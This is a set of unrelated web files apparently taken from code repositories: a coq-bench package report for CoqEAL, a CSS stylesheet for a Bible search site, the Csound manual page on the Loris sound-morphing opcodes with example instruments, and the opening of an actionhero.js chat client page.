<li>517 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/seqmx.glob</code></li>
<li>503 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/dvdring.glob</code></li>
<li>467 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/kaplansky.glob</code></li>
<li>448 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/multipoly.glob</code></li>
<li>316 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/seqpoly.vo</code></li>
<li>315 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/polydvd.vo</code></li>
<li>311 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/similar.vo</code></li>
<li>300 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/smithpid.vo</code></li>
<li>299 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/hpoly.glob</code></li>
<li>291 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/mxstructure.vo</code></li>
<li>269 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/smith.vo</code></li>
<li>267 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/edr.vo</code></li>
<li>266 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/fpmod.vo</code></li>
<li>247 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/polydvd.glob</code></li>
<li>246 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/coherent.vo</code></li>
<li>230 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binint.vo</code></li>
<li>216 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/stronglydiscrete.glob</code></li>
<li>211 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/stronglydiscrete.vo</code></li>
<li>209 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/binetcauchy.vo</code></li>
<li>203 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/fpmod.glob</code></li>
<li>202 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/seqpoly.glob</code></li>
<li>194 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/bareiss.vo</code></li>
<li>192 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/rational.vo</code></li>
<li>182 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/bareiss_dvdring.vo</code></li>
<li>176 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binrat.vo</code></li>
<li>172 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/mxstructure.glob</code></li>
<li>168 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/similar.glob</code></li>
<li>167 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/edr.glob</code></li>
<li>165 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/coherent.glob</code></li>
<li>163 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/seqmx_complements.vo</code></li>
<li>163 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/ssrcomplements.vo</code></li>
<li>156 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/examples/irred.vo</code></li>
<li>156 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binint.glob</code></li>
<li>153 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/poly_div.vo</code></li>
<li>147 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binrat.glob</code></li>
<li>144 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/binetcauchy.glob</code></li>
<li>141 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/minor.vo</code></li>
<li>139 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/smithpid.glob</code></li>
<li>134 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/bareiss.glob</code></li>
<li>128 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/bareiss_eff.glob</code></li>
<li>127 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/atomic_operations.vo</code></li>
<li>125 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/karatsuba.vo</code></li>
<li>123 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/smith.glob</code></li>
<li>120 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binnat.vo</code></li>
<li>111 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/rational.glob</code></li>
<li>105 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/bareiss_dvdring.glob</code></li>
<li>95 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/toomcook.vo</code></li>
<li>89 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binnat.glob</code></li>
<li>89 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/ssrcomplements.glob</code></li>
<li>86 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/gauss.vo</code></li>
<li>79 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/multipoly.v</code></li>
<li>79 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/minor.glob</code></li>
<li>78 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/rank.vo</code></li>
<li>77 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/refinements.glob</code></li>
<li>72 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/examples/irred.glob</code></li>
<li>71 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/dvdring.v</code></li>
<li>70 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/strassen.vo</code></li>
<li>68 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/karatsuba.vo</code></li>
<li>62 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binord.vo</code></li>
<li>61 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/karatsuba.glob</code></li>
<li>61 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/atomic_operations.glob</code></li>
<li>55 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/seqmx_complements.glob</code></li>
<li>55 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/seqmx.v</code></li>
<li>55 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/poly_div.glob</code></li>
<li>55 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/poly_op.vo</code></li>
<li>52 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/boolF2.vo</code></li>
<li>51 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/trivial_seq.vo</code></li>
<li>47 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/hrel.vo</code></li>
<li>46 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/ssralg_ring_tac.vo</code></li>
<li>45 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/bareiss_eff.v</code></li>
<li>41 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/pos.vo</code></li>
<li>34 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/toomcook.glob</code></li>
<li>33 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/karatsuba.glob</code></li>
<li>33 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/hpoly.v</code></li>
<li>30 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/kaplansky.v</code></li>
<li>30 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/fpmod.v</code></li>
<li>29 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/polydvd.v</code></li>
<li>28 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/rank.glob</code></li>
<li>27 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/strassen.glob</code></li>
<li>27 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/gauss.glob</code></li>
<li>25 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/stronglydiscrete.v</code></li>
<li>24 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/seqpoly.v</code></li>
<li>24 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/mxstructure.v</code></li>
<li>23 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binord.glob</code></li>
<li>21 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binrat.v</code></li>
<li>21 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/similar.v</code></li>
<li>21 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/coherent.v</code></li>
<li>20 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/edr.v</code></li>
<li>19 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/binetcauchy.v</code></li>
<li>17 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binint.v</code></li>
<li>17 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/refinements.v</code></li>
<li>15 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binnat.v</code></li>
<li>15 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/bareiss.v</code></li>
<li>14 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/rational.v</code></li>
<li>14 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/bareiss_dvdring.v</code></li>
<li>14 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/smithpid.v</code></li>
<li>13 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/hrel.glob</code></li>
<li>12 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/smith.v</code></li>
<li>12 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/boolF2.glob</code></li>
<li>12 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/ssrcomplements.v</code></li>
<li>12 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/trivial_seq.glob</code></li>
<li>11 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/examples/irred.v</code></li>
<li>10 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/seqmx_complements.v</code></li>
<li>9 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/minor.v</code></li>
<li>7 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/atomic_operations.v</code></li>
<li>7 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/pos.glob</code></li>
<li>7 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/param.glob</code></li>
<li>7 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/poly_div.v</code></li>
<li>6 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/ssralg_ring_tac.glob</code></li>
<li>5 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/karatsuba.v</code></li>
<li>5 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/poly_op.glob</code></li>
<li>5 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/binord.v</code></li>
<li>4 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/strassen.v</code></li>
<li>4 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/toomcook.v</code></li>
<li>4 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/boolF2.v</code></li>
<li>3 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/rank.v</code></li>
<li>3 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/gauss.v</code></li>
<li>3 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/param.v</code></li>
<li>3 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/hrel.v</code></li>
<li>2 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/trivial_seq.v</code></li>
<li>2 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/karatsuba.v</code></li>
<li>2 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/pos.v</code></li>
<li>2 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/theory/ssralg_ring_tac.v</code></li>
<li>1 K <code>../ocaml-base-compiler.4.09.1/lib/coq/user-contrib/CoqEAL/refinements/poly_op.v</code></li>
</ul>
<h2>Uninstall 🧹</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>opam remove -y coq-coqeal.1.0.1</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Missing removes</dt>
<dd>
none
</dd>
<dt>Wrong removes</dt>
<dd>
none
</dd>
</dl>
</div>
</div>
</div>
<hr/>
<div class="footer">
<p class="text-center">
Sources are on <a href="https://github.com/coq-bench">GitHub</a> © Guillaume Claret 🐣
</p>
</div>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script src="../../../../../bootstrap.min.js"></script>
</body>
</html>
|
css/style.css
|
emrickgarrett/BibleProject
|
.content{
padding-top:2em;
width:80%;
margin-left:auto;
margin-right:auto;
}
.bible-search-header{
text-align:center;
}
.bible-search-text{
font-family: 'Pacifico', cursive;
font-size:4em;
}
.bible-search-descrip{
font-family: 'Pacifico', cursive;
font-size:1.5em;
}
.results{
text-align:left;
}
.result-item{
border-bottom-color: lightgray;
border-bottom-width: thin;
border-bottom-style: solid;
}
.result-item-text{
font-size:1em;
font-family:"Helvetica Neue", Helvetica, Arial, sans-serif;
}
.result-item-title{
font-size:1.5em;
font-family:"Helvetica Neue", Helvetica, Arial, sans-serif;
}
|
docs/manual/loris.html
|
ketchupok/csound.github.io
|
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Loris Opcodes</title>
<link rel="stylesheet" type="text/css" href="csound.css" />
<meta name="generator" content="DocBook XSL Stylesheets V1.78.1" />
<link rel="home" href="index.html" title="The Canonical Csound Reference Manual" />
<link rel="up" href="SpectralTop.html" title="Spectral Processing" />
<link rel="prev" href="SpectralATS.html" title="ATS Spectral Processing" />
<link rel="next" href="arraysfft.html" title="Array-based spectral opcodes" />
</head>
<body>
<div class="navheader">
<table width="100%" summary="Navigation header">
<tr>
<th colspan="3" align="center">Loris Opcodes</th>
</tr>
<tr>
<td width="20%" align="left"><a accesskey="p" href="SpectralATS.html">Prev</a> </td>
<th width="60%" align="center">Spectral Processing</th>
<td width="20%" align="right"> <a accesskey="n" href="arraysfft.html">Next</a></td>
</tr>
</table>
<hr />
</div>
<div class="section">
<div class="titlepage">
<div>
<div>
<h2 class="title" style="clear: both"><a id="loris"></a>Loris Opcodes</h2>
</div>
</div>
</div>
<div class="note" style="margin-left: 0.5in; margin-right: 0.5in;">
<table border="0" summary="Note">
<tr>
<td rowspan="2" align="center" valign="top" width="25">
<img alt="[Note]" src="images/note.png" />
</td>
<th align="left">Note</th>
</tr>
<tr>
<td align="left" valign="top">
<p>These opcodes are an optional component of Csound5. You can check if they are installed by using the command 'csound -z' which lists all available opcodes.</p>
</td>
</tr>
</table>
</div>
<p>The Loris family of opcodes wraps:
<a class="link" href="lorisread.html" title="lorisread"><em class="citetitle">lorisread</em></a>
which imports a set of bandwidth-enhanced partials from a SDIF-format data file, applying control-rate frequency, amplitude, and bandwidth scaling envelopes, and stores the modified partials in memory;
<a class="link" href="lorismorph.html" title="lorismorph"><em class="citetitle">lorismorph</em></a>,
which morphs two stored sets of bandwidth-enhanced partials and stores a new set of partials representing the morphed sound. The morph is performed by linearly interpolating the parameter envelopes (frequency, amplitude, and bandwidth, or noisiness) of the bandwidth-enhanced partials according to control-rate frequency, amplitude, and bandwidth morphing functions, and
<a class="link" href="lorisplay.html" title="lorisplay"><em class="citetitle">lorisplay</em></a>,
which renders a stored set of bandwidth-enhanced partials using the method of Bandwidth-Enhanced Additive Synthesis implemented in the Loris software, applying control-rate frequency, amplitude, and bandwidth scaling envelopes.
</p>
<p>For more information about sound morphing and manipulation using
Loris and the Reassigned Bandwidth-Enhanced Additive Model, visit the
Loris web site at <a class="ulink" href="http://www.cerlsoundgroup.org/Loris" target="_top">www.cerlsoundgroup.org/Loris</a>.</p>
<h3><a id="idm47161654927632"></a>Examples</h3>
<div class="example">
<a id="idm47161654927248"></a>
<p class="title">
<strong>Example 6. Play the partials wihtout modification</strong>
</p>
<div class="example-contents">
<pre class="programlisting">
<span class="comment">;
; Play the partials in clarinet.sdif
; from 0 to 3 sec with 1 ms fadetime
; and no frequency , amplitude, or
; bandwidth modification.
;</span>
<span class="oblock">instr 1</span>
ktime <span class="opc">linseg</span> 0, p3, 3.0 <span class="comment">; linear time function from 0 to 3 seconds</span>
<span class="opc">lorisread</span> ktime, "clarinet.sdif", 1, 1, 1, 1, .001
asig <span class="opc">lorisplay</span> 1, 1, 1, 1
<span class="opc">out</span> asig
<span class="oblock">endin</span></pre>
</div>
</div>
<br class="example-break" />
<div class="example">
<a id="idm47161654920256"></a>
<p class="title">
<strong>Example 7. Add tuning and vibrato</strong>
</p>
<div class="example-contents">
<pre class="programlisting">
<span class="comment">; Play the partials in clarinet.sdif
; from 0 to 3 sec with 1 ms fadetime
; adding tuning and vibrato, increasing the
; "breathiness" (noisiness) and overall
; amplitude, and adding a highpass filter.
;</span>
<span class="oblock">instr 2</span>
ktime <span class="opc">linseg</span> 0, p3, 3.0 <span class="comment">; linear time function from 0 to 3 seconds</span>
<span class="comment">; compute frequency scale for tuning</span>
<span class="comment">; (original pitch was G#4)</span>
ifscale <span class="op">=</span> <span class="opc">cpspch</span>(p4)<span class="op">/</span><span class="opc">cpspch</span>(8.08)
<span class="comment">; make a vibrato envelope</span>
kvenv <span class="opc">linseg</span> 0, p3/6, 0, p3/6, .02, p3/3, .02, p3/6, 0, p3/6, 0
kvib <span class="opc">oscil</span> kvenv, 4, 1 <span class="comment">; table 1, sinusoid</span>
kbwenv <span class="opc">linseg</span> 1, p3<span class="op">/</span>6, 1, p3<span class="op">/</span>6, 2, 2<span class="op">*</span>p3<span class="op">/</span>3, 2
<span class="opc">lorisread</span> ktime, "clarinet.sdif", 1, 1, 1, 1, .001
a1 <span class="opc">lorisplay</span> 1, ifscale<span class="op">+</span>kvib, 2, kbwenv
a2 <span class="opc">atone</span> a1, 1000 <span class="comment">; highpass filter, cutoff 1000 Hz</span>
<span class="opc">out</span> a2
<span class="oblock">endin</span></pre>
</div>
</div>
<br class="example-break" />
<p>The instrument in the first example synthesizes a clarinet tone from
beginning to end using partials derived from reassigned
bandwidth-enhanced analysis of a three-second clarinet tone, stored in
a file, <code class="filename">clarinet.sdif</code>. The instrument in Example 2 adds tuning and
vibrato to the clarinet tone synthesized by instr 1, boosts its
amplitde and noisiness, and applies a highpass filter to the
result. The following score can be used to test both of the
instruments described above.</p>
<pre class="programlisting">
<span class="comment">; make sinusoid in table 1</span>
<span class="stamnt">f</span> 1 0 4096 10 1
<span class="comment">; play instr 1</span>
<span class="comment">; strt dur</span>
<span class="stamnt">i</span> 1 0 3
<span class="stamnt">i</span> 1 + 1
<span class="stamnt">i</span> 1 + 6
<span class="stamnt">s</span>
<span class="comment">; play instr 2</span>
<span class="comment">; strt dur ptch</span>
<span class="stamnt">i</span> 2 1 3 8.08
<span class="stamnt">i</span> 2 3.5 1 8.04
<span class="stamnt">i</span> 2 4 6 8.00
<span class="stamnt">i</span> 2 4 6 8.07
<span class="stamnt">e</span></pre>
<div class="example">
<a id="idm47161654888464"></a>
<p class="title">
<strong>Example 8. Morph partials</strong>
</p>
<div class="example-contents">
<pre class="programlisting">
<span class="comment">; Morph the partials in clarinet.sdif into the
; partials in flute.sdif over the duration of
; the sustained portion of the two tones (from
; .2 to 2.0 seconds in the clarinet, and from
; .5 to 2.1 seconds in the flute). The onset
; and decay portions in the morphed sound are
; specified by parameters p4 and p5, respectively.
; The morphing time is the time between the
; onset and the decay. The clarinet partials are
; shfited in pitch to match the pitch of the flute
; tone (D above middle C).
;</span>
<span class="oblock">instr</span> 1
ionset <span class="op">=</span> p4
idecay <span class="op">=</span> p5
itmorph <span class="op">=</span> p3 <span class="op">-</span> (ionset <span class="op">+</span> idecay)
ipshift <span class="op">=</span> <span class="opc">cpspch</span>(8.02)<span class="op">/</span><span class="opc">cpspch</span>(8.08)
<span class="comment">; clarinet time function, morph from .2 to 2.0 seconds</span>
ktcl <span class="opc">linseg</span> 0, ionset, .2, itmorph, 2.0, idecay, 2.1
<span class="comment">; flute time function, morph from .5 to 2.1 seconds</span>
ktfl <span class="opc">linseg</span> 0, ionset, .5, itmorph, 2.1, idecay, 2.3
kmurph <span class="opc">linseg</span> 0, ionset, 0, itmorph, 1, idecay, 1
<span class="opc">lorisread</span> ktcl, "clarinet.sdif", 1, ipshift, 2, 1, .001
<span class="opc">lorisread</span> ktfl, "flute.sdif", 2, 1, 1, 1, .001
<span class="opc">lorismorph</span> 1, 2, 3, kmurph, kmurph, kmurph
asig <span class="opc">lorisplay</span> 3, 1, 1, 1
<span class="opc">out</span> asig
<span class="oblock">endin</span></pre>
</div>
</div>
<br class="example-break" />
<div class="example">
<a id="idm47161654871536"></a>
<p class="title">
<strong>Example 9. More morphing</strong>
</p>
<div class="example-contents">
<pre class="programlisting">
<span class="comment">; Morph the partials in trombone.sdif into the
; partials in meow.sdif. The start and end times
; for the morph are specified by parameters p4
; and p5, respectively. The morph occurs over the
; second of four pitches in each of the sounds,
; from .75 to 1.2 seconds in the flutter-tongued
; trombone tone, and from 1.7 to 2.2 seconds in
; the cat's meow. Different morphing functions are
; used for the frequency and amplitude envelopes,
; so that the partial amplitudes make a faster
; transition from trombone to cat than the frequencies.
; (The bandwidth envelopes use the same morphing
; function as the amplitudes.)
;</span>
<span class="oblock">instr</span> 2
ionset <span class="op">=</span> p4
imorph <span class="op">=</span> p5 <span class="op">-</span> p4
irelease <span class="op">=</span> p3 <span class="op">-</span> p5
kttbn <span class="opc">linseg</span> 0, ionset, .75, imorph, 1.2, irelease, 2.4
ktmeow <span class="opc">linseg</span> 0, ionset, 1.7, imorph, 2.2, irelease, 3.4
kmfreq <span class="opc">linseg</span> 0, ionset, 0, .75*imorph, .25, .25*imorph, 1, irelease, 1
kmamp <span class="opc">linseg</span> 0, ionset, 0, .75*imorph, .9, .25*imorph, 1, irelease, 1
<span class="opc">lorisread</span> kttbn, "trombone.sdif", 1, 1, 1, 1, .001
<span class="opc">lorisread</span> ktmeow, "meow.sdif", 2, 1, 1, 1, .001
<span class="opc">lorismorph</span> 1, 2, 3, kmfreq, kmamp, kmamp
asig <span class="opc">lorisplay</span> 3, 1, 1, 1
<span class="opc">out</span> asig
<span class="oblock">endin</span></pre>
</div>
</div>
<br class="example-break" />
<p>The instrument in the first morphing example performs a sound morph
between a clarinet tone and a flute tone using reassigned
bandwidth-enhanced partials stored in <code class="filename">clarinet.sdif</code> and
<code class="filename">flute.sdif</code>.</p>
<p>The morph is performed over the sustain portions of the tones,
2. seconds to 2.0 seconds in the case of the clarinet tone and .5
seconds to 2.1 seconds in the case of the flute tone. The time index
functions, ktcl and ktfl, align the onset and decay portions of the
tones with the specified onset and decay times for the morphed sound,
specified by parameters p4 and p5, respectively. The onset in the
morphed sounds is purely clarinet partial data, and the decay is
purely flute data. The clarinet partials are shifted in pitch to match
the pitch of the flute tone (D above middle C).</p>
<p>The instrument in the second morphing example performs a sound morph
between a flutter-tongued trombone tone and a cat's meow using
reassigned bandwidth-enhanced partials stored in <code class="filename">trombone.sdif</code> and
<code class="filename">meow.sdif</code>. The data in these SDIF files have been channelized and
distilled to establish correspondences between partials.</p>
<p>The two sets of partials are imported and stored in memory
locations labeled 1 and 2, respectively. Both of the original sounds
have four notes, and the morph is performed over the second note in
each sound (from .75 to 1.2 seconds in the flutter-tongued trombone
tone, and from 1.7 to 2.2 seconds in the cat's meow). The different
time index functions, kttbn and ktmeow, align those segments of the
source and target partial sets with the specified morph start, morph
end, and overall duration parameters. Two different morphing functions
are used, so that the partial ammplitudes and bandwidth coefficients
morph quickly from the trombone values to the cat's-meow values, and
the frequencies make a more gradual transition. The morphed partials
are stored in a memory location labeled 3 and rendered by the
subsequent lorisplay instruction. They could also have been used as a
source for another morph in a three-way morphing instrument. The
following score can be used to test both of the instruments described
above.</p>
<pre class="programlisting">
<span class="comment">; play instr 1</span>
<span class="comment">; strt dur onset decay</span>
<span class="stamnt">i</span> 1 0 3 .25 .15
<span class="stamnt">i</span> 1 + 1 .10 .10
<span class="stamnt">i</span> 1 + 6 1. 1.
<span class="stamnt">s</span>
<span class="comment">; play instr 2</span>
<span class="comment">; strt dur morph_start morph_end</span>
<span class="stamnt">i</span> 2 0 4 .75 2.75
<span class="stamnt">e</span></pre>
<h3><a id="idm47161654842688"></a>Credits</h3>
<p>This implementation of the Loris unit generators was written by Kelly
Fitz (<a class="ulink" href="mailto:loris@cerlsoundgroup.org" target="_top">loris@cerlsoundgroup.org</a>).</p>
<p>It is patterned after a prototype implementation of the <span class="emphasis"><em>lorisplay</em></span> unit generator written by Corbin Champion, and based on the method of Bandwidth-Enhanced Additive Synthesis and on the sound morphing algorithms implemented in the Loris library for sound modeling and manipulation. The opcodes were further adapted as a plugin for Csound 5 by Michael Gogins.</p>
</div>
<div class="navfooter">
<hr />
<table width="100%" summary="Navigation footer">
<tr>
<td width="40%" align="left"><a accesskey="p" href="SpectralATS.html">Prev</a> </td>
<td width="20%" align="center">
<a accesskey="u" href="SpectralTop.html">Up</a>
</td>
<td width="40%" align="right"> <a accesskey="n" href="arraysfft.html">Next</a></td>
</tr>
<tr>
<td width="40%" align="left" valign="top">ATS Spectral Processing </td>
<td width="20%" align="center">
<a accesskey="h" href="index.html">Home</a>
</td>
<td width="40%" align="right" valign="top"> Array-based spectral opcodes</td>
</tr>
</table>
</div>
</body>
</html>
|
actionhero/public/chat.html
|
semiosis/electron-actionhero
|
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="content-language" content="en" />
<meta name="description" content="actionhero.js" />
<link href='css/actionhero.css' rel='stylesheet' type='text/css'>
<link rel="icon" href="favicon.ico">
<title>actionhero.js</title>
<script type="text/javascript" src="javascript/actionheroClient.js"></script>
<script type="text/javascript">
var client;
var boot = function(){
client = new ActionheroClient({url: 'http://localhost:' + (window.location.port || 8080)});
client.on('connected', function(){ console.log('connected!') })
client.on('disconnected', function(){ console.log('disconnected :(') })
client.on('error', function(error){ console.log('error', error.stack) })
client.on('reconnect', function(){ console.log('reconnect') })
